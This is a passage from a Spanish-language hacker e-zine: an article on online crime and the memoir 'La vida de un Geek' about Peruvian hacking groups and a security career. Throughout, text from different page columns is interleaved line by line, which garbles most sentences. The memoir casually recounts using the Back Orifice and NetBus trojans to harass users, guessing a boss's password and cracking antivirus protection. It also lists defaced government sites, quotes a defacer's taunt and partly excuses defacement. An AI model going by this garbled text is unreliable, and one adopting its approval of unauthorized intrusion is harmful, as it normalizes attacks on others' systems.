trónico es algo indescriptible en primera instancia, texto”, y el “usuario legítimo”, seríamos nosotros,
no tanto, cuando te vas haciendo con más de una los que contamos con un teléfono de nuestro La naturaleza multi propósito de las computadoras
cuenta, y no es nada risible y hasta gastritís puedes proveedor. Todo esto es debido a que se realizan las conviernten en herramientas muy poderosas; y
tener cuando administras servidores de correo cientos, o miles de peticiones al mismo tiempo y ésta frase abarca todo el concepto; “Internet es solo
electrónico para empresas. ¿Porque lo menciono? de manera consecutiva; con lo cual; se genera una una vía de comunicación muy poderosa”.
A quien de nosotros no nos ha llegado un correo “denegación”; es decir; no se puede atender a
electrónico de alguna persona que no tenemos la todas las peticiones de manera óptima. Para los Una frase con la que deseo terminar esta breve
más minima idea de quién es?. Y que para “re- que tienen hijos o sobrinos; tienes un sobrino? un introducción al tema es:
matar”, nos ofrece algun tipo de medicamento hijo?. Imaginate tener 10 o 20? y que todos ellos “Internet no es más, que el reflejo de nuestra socie-
mágico que hara las delicias de nuestras noches solicitandote algo al mismo tiempo y de manera dad”.
con la pareja, o de juguetes de la misma indole, o constante, de seguro que tendrías ya un crono-
de super ofertas de software imperdibles, o de grama de citas con tu psiquiatra. Es un buen Comentarios, sugerencias: ReYDeS@gmail.com
algun señor de del continente Africano que nos parangón. En internet se realizan este tipo de
dice generosamente que desea compartir una ataques, con las denominadas granjas de compu-
La vida de un Geek (2da y 3ra Parte)
herencia multi millonaria, o las típicas carta ca- tadoras “zombie”, hablamos de miles, que a la
dena, de chicas al borde la muerte, de niños con orden de computadoras “maestras”, son sincroni- Escrito por HaCKsPy
deformaciones que necesitan tu ayuda, de cartas zadas por un atacante contra cierto objetivo. De
de virgenes del tipo “envia esto a 4 millones de esta manera, pueden literalmente “bloquear” o
contactos” o al día siguiente tu madre, tu hermana, “sacar de combate” cualquier pagina web o servi- La vida de un geek parte 2
tu hija, tu tortuga, y hasta el par de lombrices dor del mundo, interrumpiendo su normal fun-
Como sabrán algunos... este “artículo” lo empecé a
(hembras) que tienes en el estómago morirán mis- cionamiento; éste tipo de ataques lo han sufrido
escribir en su 1ra parte de las épocas de pHC en el año
teriosamente?. Todo lo descrito anteriormente no grandes corporaciones como Microsoft, yahoo,
98 (fué hosteado en phc hace mil años) y luego lo publi-
son más que mecanísmos cada vez mas ingeniosos ebay, y hasta los Root Servers o Servidores Raices,
camos en un ejemplar de esta nuestra querida revista...
de personas inescrupulosas crean, para obtener los pilares de internet.
y bueno... luego de muchas críticas, comentarios y
direcciones de correo electrónicos válidas y de ésta
6. Intrusiones No autorizadas o ilegales a Siste- demás... quería mostrarles la segunda y tercera parte de
manera puedan esparcir éste tipo de correo inde-
mas de Cómputo: esta especie de autobiograífa. Espero ladeisfruten amigos
seado. Estos negocios mueven millones de dolares
míos...
y son muy lucrativos para ellos y muy molestos
Estos son los casos mas ampliamente difundidos
para nosotros.
tanto por la prensa local, nacional e internacional, Debo agradecer antes que
para el caso Peruano, tenemos recientemente el nada por las críticas,
4. Amenazas o extorsión vía correo electrónico
tema de una “intentona” de guerra cibernética buenas y malas... que al
Era de percibir que con la expasión de internet, los entre los amigos del sur, y los nacionales. Todo se final.. todas nos hacen
“males” de nuestra sociedad tangible, se extrapo- inicio con los denominados “defacings”; que no buenas personas... Me
laran a internet; a lo “virtual”. Que opinarias, si son mas; que acciones que implican la explotación apenó que los comentarios
cierto día entras a internet y decides relajarte vi- de alguna falla en un sistema para la posterior en ciertos casos no fuesen
endo algunas fotos de chicas ligeras de ropa, y te modificación de su página principal, colocando en hechos a mi persona, si no que tuve que enterarme
das con la ingrata sorpresa de que una de ellas es la mayoría de veces mensajes obscenos, agresivos, por terceras personas... pero en fín... aclarados los
tu pareja?. Y mas ingrato aún, con alguíen que no hirientes, contra los “rivales”. Esto llevó a un comentarios y solucionados los problemas... con-
eres tú?. Pues bien, aparte de existir sitios en inter- “toma y daca” que gracias a una actitud aplaudida tinuaremos el relato...
net donde se ventilan estos casos; sin el consenti- por la Escena Peruana; la parte Peruana detuvo los
miento de las “victimas”, también existen sitios ataques.

10 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

ciona se revisa se abre, se verifican los básicos, misma, seguimos profundizando sobre distribu-
Disclaimer: fuente, ac adaptor, tarjetitas… descarte de ley… y ciones en Linux, instalamos cuanta distro se nos
La información contenida en este artículo es provista por ahí algo había siempre que hacer… luego me puso en frente, habíamos sufrido con las instala-
únicamente para fines educativos. Pueden redis- fui a soporte técnico que ya era mas redes lo mío al ciones, con problemas de particiones en Linux,
tribuir gratuitamente o republicar este artículo, fin… recuerdo que postulé 3 veces a esa área… habíamos leído de recompilar kernel (cosa hice
siempre y cuando se cumplan con las siguientes como me querrían ahí … que las postulaciones hasta después de mucho tiempo), luego sufrí una
condiciones: el artículo se mantendrá intacto; los eran 1 al ciclo… la primera vez postulé quedé 2do pérdida fuertísima... perdí 1.7Gigas de información
apropiados créditos serán hechos al autor del en el examen, entraron 10 de 11 … yo no entré… la debido a uno de los virus SVC 5.0 o algo así, eso
artículo. segunda quedé 4to preguntaron temas teóricos y me pasa por usar antivirus nacionales ORIGINA-
Son libres de reescribir artículos basados en este volé un poquito… en esa tampoco entré… y la LES jajaja... aunque no lo crean yo compraba el
material (siempre y cuando las condiciones anteri- tercera vez.. como habrá estado de difícil el ex- hacker antivirus original... lo siento muchachos...
ores se cumplan). Se agradece si me envían algún amen que saqué 15 sobre 100… y saben que fue lo es cierto... pero ya no lo vuelvo a hacer... es mas...
correo avisándome que vana republicar el artículo o mas curioso? Que quedé primero jeje… y bueno… ahora gracias a varios trabajos que he hecho en
si escribiesen algún artículo basado en esta historia. no les quedó otra… y empecé… pero lejos de la implementaciones fuertes de productos mc affee y
Las marcas que puedan aparecer en el artículo tienen sala de servidores… malvados… no importa… symantec, tengo para mi uso personal copias de
copyright propio de cada marca. Los nombres y nick aprendí mucho de redes Windows debo admitir… evaluación de por vida en ambas marcas... (bueno
que aparezcan en la historia son pura coincidencia. de por vida es un decir, ahora no se les ocurra
Poco a poco mis conocimientos en redes mejoran pedirme una copia que no se las daré... búsquense
notablemente, siempre considero una línea diviso- las suyas que hay muchas regadas por internet)...
ria notable el día en que leí el NET3-howto (ahora las ventajas de hacer un buen trabajo... te conside-
La vida de un Geek (2da Parte)
creo que es el networking howto o el net 4 no lo ran.. y te engríen ;)
se...) fue tan radical como decir antes y después de
En el artículo anterior nos quedamos en el año 96
cristo... Si bien no fue el único howto que leí, ni Pasaron los meses y sentía que ese bichito que
si es que no me equivoco en esa época empezaba
tampoco fue el único libro que tuve de base, leí había dejado atrás eso de los hackers, pero quería
mis prácticas en soporte técnico, necesitaba mejo-
muchísimo, pregunté a algunos mucho y a otros reunir a un grupo de gente con las mismas interro-
rar mis bases en networking, sentía que solo vivía
poco... y si... a mi también alguna vez me re- gantes que yo y avanzar juntos por un bien
usando tools y algo dentro de mi me decía que eso
spondieron RTFM, tuve que leer y leer, practicar y común... el aprender. Recuerdo que paraba ton-
no estaba bien...
practicar... pero me sirvió, por que en poco tiempo teando mucho por los canales de dalnet (cosa que
empecé a entender muchas de aquellas cosas que no hago hace mucho tiempo)... #Peru... aún recu-
Empecé a preguntarme como es que funcionaban
para mí eran un misterio, al fin entendí como era erdo cuando se creó #lima y #Perú con tilde (o con
muchas de las cosas que normalmente hacía con
que funcionaban las asignaciones de IP, sus más- acento como le decíamos muchos...)... las reuniones
solo bajar un tool y presionar un click, intenté
caras, las rutas, como se clasificaban, conocía algo en la barra de chacarilla... por esas épocas conocía
entender que es lo que realmente estaba haciendo
de topologías, pero eso era todo... no era sufi- la distribución de todos los IP’s de la universidad y
con este tool, trataba de comprender por que real-
ciente... había que saber mas... seguíamos conoci- de acuerdo al IP podía saber que máquina estaba
izaba tal o cual tarea, de que otra forma podría
endo de servicios, puertos y demonios (Ojo no me conectada al IRC... y quería hacer algo para auto-
hacer esas tareas, y a veces logré que funcionaran
refiero al diablito de FreeBSD, si no de los dae- matizarme la tarea... pero por algún motivo que
de forma mas eficiente, mi sed de conocimientos
mons en Unix/Linux), empezamos a practicar en nunca falta no lo hice... la cosa es que en una de
no terminaba de saciarse, y cada vez que descubría
la universidad trabajando en una red NT bastante esas por obra y gracia del destino me encuentro
algo nuevo era una puerta a un sin fin de conoci-
grande, varios dominios, mas de 1000 equipos... con un pata del cual había leído años atrás en
mientos, era un incentivo para seguir aprendi-
entender como usar las funciones “net” en línea de folder públicos de la universidad... un tal metalli-
endo.. Para seguir avanzando... si bien debo admi-
comandos de Windows (tipo net send “Hola crema... y me pregunté si era el mismo... la cosa es
tir es hasta el día de hoy frustrante cruzar una
mundo” jeje, o Net use X: \\server\dir), a manejar que estaba conectado de la universidad, fuimos a
puerta y darte cuenta... que no es el final del
bacheros con loops y variables que funcionaban la sala donde estaba y vimos quien era... luego
camino... si no que aún hay mucho pan por reba-
como parámetros de mi batch, a usar el Ghost en hablamos por irc, y de ahí en persona... hablamos
nar... sin embargo... mi sed de conocimiento hace
todo su esplendor para replicar equipos (sobre de hacking y un webo de cosas... y empezamos a
que vuelva a levantarme y empiece de cero las
todo con redes tan grandes), ya tenía encima un armar la gentita chatera de la universidad... siem-
veces que sea necesario a fin de saber el como y el
cursillo de ensamblaje en la UNI (Universidad pre manteniendo el ritmo con las vainas de inves-
por que...
Nacional de Ingeniería para la gente de afuera de tigación... con el conversamos respecto a hacernos
Perú), bueno... no se... eran demasiados cambios... un script para IRC que saque la máquina de los
Fue una época que de verdad sentía que no
ya no era el mismo vago que empezó la universi- patas que estaban conectados desde la universidad
avanzaba, o que estaba viendo temas que de re-
dad, empezamos a entender que la universidad en esa época casi nadie usaba bouncers en IRC,
pente eran muy básicos para el level que a mi
está para aprender, y bueno... malogrando se eran pocos los que los usaban (yo había leído de
parecer que tenía... pero era necesario era necesario
aprende... y no es que uno fuera malogrado jeje... eso en esas épocas... pero no había conseguido
reforzar mis bases... empecé a leer desde informa-
al contrario.. si no que considero que la universi- shells gratuitos para hacerlo aún...) pero bueno...
ción de tipos de cables de red, distancias máximas
dad es toda una experiencia de vida, y dentro de por esas épocas quien sabe cuando con metalli-
soportadas, tipos de conexión, capas OSI, como
esa experiencia, la investigación que surge de la crema, el quemao, el corrupto (este último que
pueden ver... de lo mas básico, volvimos a cero…
iniciativa del alumno, a mi concepto, siempre años atrás había pertenecido conmigo a un grupito
pero era necesario... era necesario empezar de
deberá ser incentivada, aunque en la vida real no llamado tAt - The ArMaDa TeAm) y quien les
cero... era necesario tener una buena base si no.. lo
siempre es así (al menos no en Perú, no se como escribe formamos uHS, uNiVeRSiTaRy HaCKiNg
que vendría mas adelante no sería entendido y
será en otros lados), pero bueno... seguíamos SoCieTy, por esas épocas ya habíamos escuchado
mucho menos aprovechado...
aprendiendo, seguíamos investigando, creciendo de un grupo pHC, y un tal sUPERhENRY su
como geek, y también como persona, me dediqué a presidente... a diferencia de ellos, nosotros no
Hablando un poco de mi vida laboral… recuerdo
leer cuanto manual tenía en frente, había que teníamos niveles ni cargos, cada quien con su
que mi mis primeras prácticas a dólar la hora me-
aprovechar los mass downloaders y los grandes especialidad, cada quien con su level, cada quien
dio tiempo… (claro… 20 dólares a la semana)
servidores a mi cargo que podía usar como re- con su marcianada, pero todos al final un grupo de
cuando estás en la universidad esa plata es todo
positorio, bajamos sites enteros, y probamos amigos con algo en común, la sed de conoci-
jeje… pero bueno.. trabajé en servicio técnico dedi-
cuanta herramienta pasó por nuestras manos, miento... aquellos tiempos fueron de lo mejor...
cado al hardware… reparando PC’s, reparando
probábamos ya no el tool si no buscábamos en- conocí a una chica que me movió mucho el piso...
impresoras láser, de inyección, matriciales, monito-
tender la tecnología y el funcionamiento de la era .. jeje.. no les voy a decir ni su nick... solo les
res, en fin… lo que traigan se golpea… si no fun-

Lo que hagas en la vida, tendrá eco en la eternidad. 11


S E C U R I T Y W A R I P R O J E C T S

puedo decir que agarramos, pero tenía macho.. y que deja la información abierta para que cualquier
bueno.. miles de cosas pasaron... me pregunto si persona lo pueda recoger...
luego de tanto tiempo podría pasar algo con ella,
siempre me quedé con esa duda, pero bueno... un Les pongo un ejemplo, a ver si opinamos igual: “Si
consejo les doy: a los hombres... no lleven a sus ustedes están por la calle, y se encuentran con un
flacas, agarres, etc, etc, etc a las reuniones under folder confidencial militar en un teléfono público,
por que se darán cuenta que esto es mas impor- ¿es mi culpa que me apodere de esa información?
tante para nosotros, y a ustedes flacas, no busquen Tal vez hay un tema de difusión de la misma, pero
entender como una computadora A VECES (OJO estaríamos hablando de un tema moral, mas no de
dije a veces) es mas sexy que ustedes... y si les dan un tema legal... o si? no se... de repente estoy
a escoger... como le dijo un amigo a su enamorada, equivocado... solo les cuento algunas ideas sueltas
“al menos ellas no se quejan ... jajaja” (casi lo que tengo en mi mente...”
patean). Por esas épocas me encontré con sUPERhENRY, ya
06/08/2004: http://www.munijesusmaria.gob.pe
mi level en temas de networking estaba bastante 06/02/2004: http://www.satt.gob.pe
En esas épocas aún estaba en soporte técnico vi- mas desarrollado y bueno nos pusimos a conversar 06/02/2004: http://www.senasa.gob.pe
06/02/2004: http://www.cnd.gob.pe
endo redes… pero por épocas sentía que me hacían de muchos temas, de los antivirus, de como se 05/18/2004: http://www.tc.gob.pe
04/28/2004: http://www.drtpetacna.gob.pe
la vida imposible y no me querían ahí… me borra- hacía para poder quitarle la protección, cuales 04/28/2004: http://www.tc.gob.pe
04/26/2004: http://tribunal.mef.gob.pe
ban data, y recuerdo 1 vez me descontaron sueldo serían las razones que orientarían a alguien el 04/26/2004: http://cpn.mef.gob.pe
por unas horas que no pasé en una lista en la que hacerlo, no se… de todo un poco.. a la larga estaba 04/04/2004: http://conam.gob.pe
03/31/2004: http://www2.munimolina.gob.pe
marcabas horas, sin embargo recibí menos de la hablando con una celebridad jeje… y me encontré 03/31/2004: http://www.muniindependencia.gob.pe
03/21/2004: http://www.acuerdonacional.gob.pe
mitad de mi sueldo y fue la gota que colmó el con un pata sencillo, como yo... algo presumido... 03/02/2004: http://www.conam.gob.pe/defacement.htm
02/18/2004: http://www.munibrena.gob.pe/hack.htm
vaso… llamé a un buen amigo que era mi jefe en pero buena gente... luego de un tiempo nos hici- 02/11/2004: http://www.munibrena.gob.pe/mindworx.htm
servicio técnico (mi antigua área de trabajo la de mos patas y nos encontrábamos en el MSN para 02/02/2004: http://www.conam.gob.pe/index.htm
01/20/2004: http://www.conam.gob.pe/decreto.htm
HW recuerdan?) y le pedí regresar a lo que el chatear o a veces nos encontramos en la barra, 12/21/2003: http://www.muniayabaca.gob.pe
11/23/2003: http://www.pronaa.gob.pe/scripts
accedió inmediatamente… la leyenda había vuelto. recuerdo que la primera vez lo conocí en una
Solo que ahora regresamos a un almacén… recu- cabina cerca a petit thouars con javier prado,
erdo que paramos (arreglamos) algo de 40 máqui- donde atendía menina du algo... una brasilera muy
Estas páginas Web sufrieron defacements... (ahí
nas de un cementerio de chatarra, con el thornthon rica... por esas épocas estuve por desarrollarles
coloco la fecha en que sucedieron), se han dado
buen pata, muy noble y bastante hábil en temas de unas páginas para una tienda en internet... pero al
cuenta que son sites .gob.pe? Hackers? Crackers?
HW, así que bueno… dentro de los equipos de baja final no se llegó a nada... pero bueno.. en esa
Skipt Kiddies con afán de figurar explotando vul-
logramos armar un frankestein, le dimos vida, cabina lo conocí a henry... y de ahí ya nos veíamos
nerabilidades sencillas? Los dejo a su criterio...
pero le faltaba un alma… fue un Linux… ahí fue en la barra, y conversábamos... no recuerdo
en ese almacén/laboratorio ahí fue donde juga- cuando ni como fue que me hice trial member en (fuente:
mos, ahí fue donde vimos caer nuestra primer pHC por los temas de hacking, ya que la mayoría http://www.zone-h.org/en/search/what=gob.pe
instalación grupal de Linux… ahí fue donde todo de la gente en pHc era gente de Cracking, con un /)
era un reto, hasta sacarle la contraseña por pass- muy buen level debo añadir, lo curioso de ello es
word guessing a la máquina del jefe, en fin… hubo que recuerdo claramente que nunca henry ganó ni No me pueden decir que esa información no es
de todo… risas, lágrimas, y harta marcianada… si quiera un centavo por crackear algún programa importante... y estaba como decirlo... Como un
hasta pizza alguna vez de amanecida jeje… buenas o antivirus, no solo era ese bichito que yo ya afiche en la calle... un cartel de propaganda de los
épocas que recuerdo con mucho cariño. Jugando conocía, ese de la curiosidad... había algo mas... era muchos que “adornan” nuestra ciudad, pero lo
incluso con los troyanos de la época, back orifice y el reto... era la necesidad moral de demostrar una importante aquí es... está bien que sitios .gob.pe
net bus… que le vamos a hacer… era divertido hipótesis “que lo que ofrecían como un producto sean vulnerados por lo que veo debido a que no
sacar a un usuario de su PC como si estuviera 100% seguro, con sistemas anti-copia, y demás aseguraron bien sus sitios de internet... no me
“embrujada” jeje… no es sólo el hecho de fastidi- características se veían sin fundamento cuando un refiero a sitios súper seguros... ahora... nos hemos
arlo, si no la forma y el momento en que hacer las chico con algo de universidad podía deshacer puesto a pensar en los muchos otros sitios insegu-
cosas jeje… aquella tan “compleja” protección”, era una per- ros los cuales poseen información confidencial y
sona común y corriente, con algo de tiempo y tal vez por negligencia no son protegidos correc-
Pero retomemos… volvamos a uHS... recuerdo que muchas ganas solo eso... si alguna vez tienen la tamente? De repente dirán... no hay plata... POR
nos reuníamos los sábados en las tardes a hacer oportunidad de escuchar un documental que le FAVOR...!!! la información cuesta dinero... y si te la
algo cada vez que podíamos... instalar un Linux, hicieron a hispahack hace algunos años, aquí hay roban ... es como que te roben un carro, o una
configurar un celular para escuchar llamadas, algunos temas que solo los voy a mencionar para computadora... y si necesitan ayuda... hablen con
estudiar alguna tecnología, etc, etc, etc. Nunca dejarles algunas ideas para que se pongan a pen- nosotros... si está en nuestras manos y en nuestra
faltaba algún tema sobre el cual alguien o todo el sar... quiero que recuerden algo: No buscamos disponibilidad horaria los ayudaremos, cuando
grupo quisiera saber... nos distribuíamos la carga cometer un delito... no somos delincuentes... Ahora mínimo... les daremos las pautas para que puedan
de chamba... veíamos quien llevaba que... com- pregunto: ¿Somos concientes del poder de la im- empezar a hacer algo... estamos aquí con un
prábamos las chelas (las cervezas), algo de tragar y portancia de la seguridad en la red? ¿por que no propósito... lograr que el nivel informático del
ya había una reúna under... en la tardecita como hay interés en ese tema? Perú sea competitivo, y mas aún en temas como el
para empalmar la juerga en la noche jeje ;) aunque Uno de mis jefes me dijo que si las personas no van de la seguridad... por ejemplo... sabían... que los
digan lo contrario... a diferencia del geek común... al médico para hacerse un chequeo médico de peruanos éramos conocidos como expertos en
nosotros tratamos en lo posible de balancear lo que tiempo en tiempo, creen que esas mismas personas ingeniería inversa? y lo curioso.. me lo han dicho
es el cultivar el conocimiento con la diversión... al harán un chequeo a sus sistemas para ver la salud amigos de grupos de élite reconocidos que poseen
final de cuentas... hay una época sobre todo du- (seguridad) de los mismos? si no se han preocu- sus propias empresas de seguridad... ahora... de
rante la universidad en que dormir es opcional... pado por actualizar los sistemas, no hay preocupa- repente la forma (quitando protecciones a sistemas
ción por invertir en la seguridad de sus sistemas, posiblemente no bien protegidos) no fue la mejor o
se pone en evidencia las muchas vulnerabilidades la correcta, pero se dan cuenta de lo que podemos
en páginas que deberían estar protegidas... hay ser capaces de hacer... solo que el grupo que inició
leyes que obligan a las organizaciones a tener esto a niveles internacionales, (es decir pHC -
seguridad dentro de sus sistemas ¿o no?, creo que Peruvian Hackers & Crackers) fue perseguido por
tan culpable es el que toma la información como el las autoridades... ahora.. sabían que el Per y el TH

12 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

son antivirus reconocidos por América latina? y fin... ojalá nadie se sienta ofendido con mis cimiento... aunque la paga fuese malísima real-
actualmente si no me equivoco (no tengo el dato palabras... mente... jeje.
100% correcto) están siendo comercializados en
otros países fuera de Perú, ahora... COMO CREEN Hace poco tiempo un grupo de “hackers” chilenos, Ahí tuve la oportunidad de trabajar con Linux...
QUE ESOS ANTIVIRUS LLEGARON A MANOS realizó unos defacements en una página .com.pe pero trabajar en mí día a día... a investigar... poco a
DE COLOMBIANOS, ECUATORIANOS, CHILE- http://www.zone-h.org/defacements/mirror/id= poco cada PC o parte de PC que dejaban tirada por
NOS Y DEMAS? pudo haber sido una copia pirata 466681/ ahí... venía a formar parte de mi laboratorio...
del antivirus? la cual fue desprotegida por un Este fue el texto que dejaron...(copia textual) Monitores... Tarjetas... Placas... Lectoras..
cracker peruano? y como les pagan? per- etc,etc,etc... Me armé una pequeña red... ahí le-
siguiéndolos... feo no??? esas cosas no salen todos h4x0r3d by bl4xt3r & w0w vanté mis servicios básicos... los probaba... los
Bueno la razon de este defaced es porque siertos "hackers?" peruanos
los días amigos... esas cosas no salen en los como los denominaron en algunos diarios, estuvieron atacando sitios aseguraba... reinstalaba... probaba.. hacía y de-
chilenos, cosa que no toleramos y menos con sus ataques de php nuke?
periódicos... y lo mas curioso... ponen a acaso a trilogy team no le alcansa para algo mas? eso es todo lo que shacía... por esas épocas (año 98) levanté mi primer
pueden hacer? sql injection? nada mas? bueno bastante penosos, que
MACHADO Y A BILL GATES... Como hackers... mas se puede esperar de ustedes peruanos, espero que no vuelvan a firewall con iptables, squid (el combo firewall
invadir nuestros sitios, de lo contrario empezara una guerra que no
en la página de HACKERS FAMOSOS en la página tendrá fin.. proxy), y algunos extras de mi cosecha ;) pero en
Saludos a todos los Chilenos!!
de persystems si no me equivoco... pero acaso fin... sentado probando... averiguando... cerrando
vemos a pHC dentro de la lista? como único grupo Viva CHILE!!! ha sido, es, y sera siempre mejor que ustedes puertos... bajando servicios... hardeneando el
under peruano de la época, que los hizo sufrir POR Saludos pa INET y chr00t.. pinguino que sería mi portón de ingreso al casti-
MAS DE 5 AÑOS... violando la seguridad de sus llo... el BASTION DE DOBLE ENTRADA como lo
sistemas... y prueba de ello son algunos de los llaman en algún libro de O’Reilly.
mails en las listas de cómputo... hace muchos El atacante que lo hizo según zone-h se hace llamar
años... año 95 si bien no me equivoco... Johny the así mismo chr00t... que harían ustedes en nuestro Creo que esos días de investigación fueron de lo
cracker... publicando un antivirus nacional EL lugar... mejor… no ganaba ni cerca de algo decente, pero
MISMO DIA QUE FUE SACADO A LA Han visto lo que sucede allá afuera? se imaginan si era bastante mas que en mis anteriores prácticas…
VENTA...!!! pueden creerlo? y lo mas curioso... esta misma página fuese puesta en mmm.... EL- recuerdo que era fanático del blue jeans en esa
Persystems publico por mas de medio año un COMERCIOPERU... o no se... ejercito.mil.pe... feo época por que no había Jolt Cola en el Perú y aún
mirror de la página de pHC en su site... (si buscan no??? imagínense que la publican en la página de no la hay… la seguimos esperando, aunque Vortex
en google creo aún podrán encontrar el link segu- nuestro afamado “enemigo de los hackers peru- hace lo suyo y es un producto peruano pa variar
ramente) anos”... no creen ustedes que hay algo mal acá...??? jeje… bueno… basta de propagandas… recuerdo
que tomaba energy drinks para ir a trabajar…
por ejemplo en ... QUE VERGUENZA...!!! fue lo primero que vino a practicaba de 8:30 a 6pm y de ahí a estudiar hasta
http://www.perantivirus.com/sosvirus/noticias/ mi mente y que quieren que hagamos... que nos las 10pm y de ahí a veces volvía a la chamba a
phcrulez.htm encontrabamos... (no se si seguirá el metamos a cuanto site .cl encontremos? para revisar algo o a veces hasta a webiar debo admi-
link activo). que??? si aunque me duela admitirlo, los chilenos tir… pero bien dice el dicho que sarna con gusto
podrían entrar a cuanto site peruano encontrasen no pica.
“PER SYSTEMS S.A. hace propicia esta oportuni- por que en muchos casos no se tiene un buen nivel
dad para solicitar a las autoridades peruanas, que de seguridad... no sabemos quien es el trilogy team Ahí si que chambeaba… hasta que conocí a las
ejecuten acciones más severas en contra de los que (quien según el mensaje fue quien se hizo “fa- joyas de juerga… íbamos a mr chopp (luego Sr
cometan delitos informáticos. Hace unos días, un moso” en los diarios chilenos)... pero bueno... de- Frogs en la marina) así que ya se imaginan mi
hacker irrumpió en el servidor Web de una im- finitivamente no nos gustó el resto del mensaje... horario… 8:30am a 6pm de ahí clases hasta las
portante radio emisora nacional, alterando el con- 10pm de ahí jueves viernes y sábado de 10 hasta
tenido del menú principal del portal de este medio Internet es un mundo sin fronteras... Internet es un las 4am aprox. juerga… bueno… excepto los vier-
radial periodístico, cuyo noticia fue difundida a mundo donde blancos chinos negros rojos... no se... nes y sábado que terminábamos en medieval hasta
nivel mundial.” en fin.. todos pueden convivir... es un gran reposi- las 7 u 8 de la mañana… siempre y cuando no
torio de información... buena o mala... pero infor- tuviera clases el sábado claro está hay que ser
Lo curioso cuando hablan de este defacement mación al fin... Ojalá que este ejemplo que les dí no responsable si no hasta las 4am nomás jajaja…
(modificación de página Web) en Radio programas genere resentimientos con nuestros hermanos
del Perú, saben lo curioso de esto... me comentaron chilenos... ni que genere repercusión... en nuestros Que les quiero decir contándoles esta parte… si ya
que el site fue hackeado por la misma persona 3 compatriotas peruanos... nuestra intención... es sé… SOY UNA BESTIA jajaja… no en serio… lo
veces en 2 días usando ... LA MISMA VULNE- conversar... es opinar... y bueno... si así lo creen ... que quiero decirles es que sepan compartir el
RABILIDAD...!!! ahora... estamos de acuerdo en que se diviertan... tiempo que dedican a cada cosa en su vida… y que
que no está bien el hecho de hacer un defacement, no abusen… que toda la vida no se puede mante-
PERO TAMPOCO ESTA BIEN QUE POR LO ME- No quiero generar polémica con estos temas... así ner el mismo trajín… Por ejemplo en mi caso me
NOS TOMEN LAS MÍNIMAS ACCIONES CO- que continuaremos con el relato... subí mucho de peso con la mala vida jeje y tuve
RRECTIVAS, es decir... si viene un tipo y se mete a que dejar el trabajo por motivo de salud… y fue la
mi casa por que mi puerta no tiene cerrojo y se ... Luego de algunos meses me vuelvo a sentar en época de hacer deporte e ir al gimnasio… buena
mete... OK... no es correcto que se meta a una frente a mi máquina para continuar con mi relato... época pero distinta… ya solo fue universidad y
propiedad privada, yo también lo critico, pero La vida de un Geek se está convirtiendo poco a ejercicios… la gentita se estaba abriendo por miles
tampoco está bien que si se metieron por que tu poco en una forma de dejarles a ustedes mis ami- de vainas… ya no había tiempo… las prioridades
puerta está sin cerradura, mínimo, tráncala con gos.. un poco de mi... un poco de mi vida, de mis cambiaron… no se… es algo que no se habla entre
una silla, no te digo si quiera que la parches... pero ideas... no se si aprenderán algo de acá... solo debo los grupos de hacking… pero así pasa… uHS pasó
al menos.. haz algo para que no vuelva a suceder... agradecerles por tomarse el tiempo de leerme... a la historia… y que hacer… seguir adelante…
ahora... conozco personas que ingresan a tu site... y seguir a nuestro ritmo, seguir leyendo… nunca
de dejan una página alterna con la vulnerabilidad por esas épocas yo fui llamado a mi primera prác- detenernos… nunca dejar de aprender… avanzar
que encontraron no modifican nada... es mas.. ni tica laboral de verdad, Una empresa de servicios cuanto se pueda… en fin… nunca dejen de leer…
siquiera borran los logs para que sepas como lo de cómputo en general... había entrado para ver
hizo, no crees que eso sería como dejarte una nota algo de Linux y seguridad... y me convertí en Es difícil ver como el grupo que formaste con el
diciéndote... ten cuidado con esta falla que alguien “Consultor de seguridad y soluciones Linux”, para que pasaste buenos momentos y con los que tienes
mal intencionado te podría perjudicar?.... creo que un tipo... que recién sale en su “debut” al mercado tan buenas amistades se va distanciando, pierde
es una forma mas viable... Bueno... es mi opinión al laboral, es una forma interesante de ganar recono- ganas pierde fuerza pero así es… y hay que seguir

Lo que hagas en la vida, tendrá eco en la eternidad. 13


S E C U R I T Y W A R I P R O J E C T S

adelante, y avanzar en grupos pequeños… son Lastimosamente este trabajo tenía mucho del tema largo plazo? Que quería con mi vida ahora, fueron
creo yo los que mas duran… y algo muy impor- comercial y como que sentía que eso no era lo meses de indecisión, para colmo, durante mi época
tante… siempre mantengan un alto grado de mío… así que salí al mes… de estudiante creo que siempre tuve la suerte de
comunicación… si no hablan las cosas no van a conseguir buenos trabajos, al menos trabajos que a
llegar muy lejos… guardarse las cosas está mal... Bueno, pasaron los meses y me ofrecieron ser mi me parecían interesantes, por lo que cuando salí
sobretodo cuando hay desacuerdos entre la Sysadmin en mi antiguo trabajo (aquel que dejé empecé a probar con mis antiguos empleadores, y
gente… por enfermedad recuerdan), pues si… ahora era a ver que pasaba ahora que no tenía peros para
responsable de el mantenimiento, administración y trabajar con ellos, pero… nada… no pasaba nada,
Ok… seguimos avanzando? O lo terminamos seguridad de los equipos, a parte de soporte a ahora que había acabado la carrera, era mas caro, y
acá… si no me equivoco ya van como 7 páginas… usuarios, soporte a clientes (les comenté que esta mejor buscar a otro marciano que aún esté estudi-
yo creo que es momento de acabar la historia… red era un ISP?), así que también había algo de ando JAJAJA con lo que me costó salir… Pero no
HASTA UNA 3ERA parte… (Me pregunto cuantos soporte técnico en pre venta para algunas solucio- me quejo, luego de 5 meses de haber acabado la
años pasarán hasta que me siente a hacer la 3ra nes, entre otras cosas… ah claro… el área… estaba carrera, y luego de la recomendación de 2 buenos
parte de la vida de un geek…) jejeje bueno… por conformada por uffff… mmm.. yo sólo… ajap.. amigos de mi promoción de la facultad, conseguí
lo visto esto sigue… esto no termina… y tiene pa bienvenidos al mundo multitasking, total, sólo trabajo, necesitaban a alguien que supiera de se-
largo… hablaremos… eran 18 servidores aproximadamente, entre Linux, guridad y de redes. Y adivinen en quien pensa-
Windows, Unix, por ahí tenía hasta tiendas de ron… ASI ES…!!! Este señor que escribe el relato.
Un abrazo a todos… gracias por seguirme… gra- pago en Internet, y un servidor que era el legado
cias por llegar hasta acá… y sigan leyendo nuestra de todos los sysadmins, quienes guardaban sus Y fue así como entré como especialista de Seguri-
e-Zine cosas y hasta negocios mantenían ahí… una cosa dad a una consultora Colombiana, viendo temas
Security Wari Projects (swp para los amigos) hasta de locos… 2 Megas para mi solito… (bueno… es de implementación de productos de seguridad, así
el momento la página es www.swp-scene.org si un decir… o no?... ustedes entienden… jejeje…). como también apoyo en las consultorías de seguri-
